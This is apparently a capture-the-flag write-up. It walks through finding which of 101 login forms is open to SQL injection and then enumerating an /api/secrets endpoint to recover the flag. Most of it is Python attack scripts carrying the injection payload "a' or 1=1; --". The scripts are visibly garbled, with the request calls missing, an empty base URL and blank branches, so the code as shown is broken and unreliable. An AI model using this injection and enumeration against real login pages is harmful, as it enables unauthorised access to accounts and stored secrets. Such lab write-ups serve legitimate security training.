Opening the webpage we are given 101 (!) login forms.
Our first objective is to create a script which identifies which login form is vulnerable to a SQL-injection. One of my teammates wrote the following script using multiprocessing to find the correct form, which I then extended to solve the remaining of the challenge.
from multiprocessing.dummy import Pool
import re
import requests
import time
urlbase = ""
mainpage_response = requests.get(urlbase + "/login").text
format = """<form method="post" action="/login/(.+)">"""
endpoints = re.findall(format, mainpage_response)
def pr(i, e):
url = urlbase + "/login/" + e
login_response =, data={'username': "a' or 1=1; --", "password": "' or 1=1;--"})
if "Invalid login credentials!" not in login_response.text:
# TODO: Form is vulnerable
pool = Pool(50)
for i, e in enumerate(endpoints):
pool.apply_async(pr, args=[i, e])
When the login-form is bypassed with the SQL injection we are greeted with the following page, mentioning some API documentation located at /api-docs
(href in html code).
The /api-docs
webpage shows the API documentation of the endpoint /api/secrets
, where the flag most likely is located. All we need to do is query all the pages until we find the flag.
Using the following script,
, we search for the flag among the secrets:
from multiprocessing.dummy import Pool
import re
import requests
import time
urlbase = ""
mainpage_response = requests.get(urlbase + "/login").text
format = """<form method="post" action="/login/(.+)">"""
endpoints = re.findall(format, mainpage_response)
def pr(i, e):
url = urlbase + "/login/" + e
login_response =, data={'username': "a' or 1=1; --", "password": "' or 1=1;--"})
if "Invalid login credentials!" not in login_response.text:
# Create a session, or else we do not keep our authentication
s = requests.Session()
r =, data={'username': "a' or 1=1; --", "password": "' or 1=1;--"})
for i in range(1, 100):
r = s.get(urlbase + f"/api/secrets?page={i}&page_size=20")
if "EPT" in r.text:
res = r.json()
for secret in res.get("secrets", []):
if "EPT" in secret.get("text", ""):
pool = Pool(50)
for i, e in enumerate(endpoints):
pool.apply_async(pr, args=[i, e])
At page 80, with id 1598, we find the flag.
$ python3
{'id': 1598, 'text': 'EPT{0ae0fbea-9a8c-4b2c-8e33-b383c8c8f94f}'}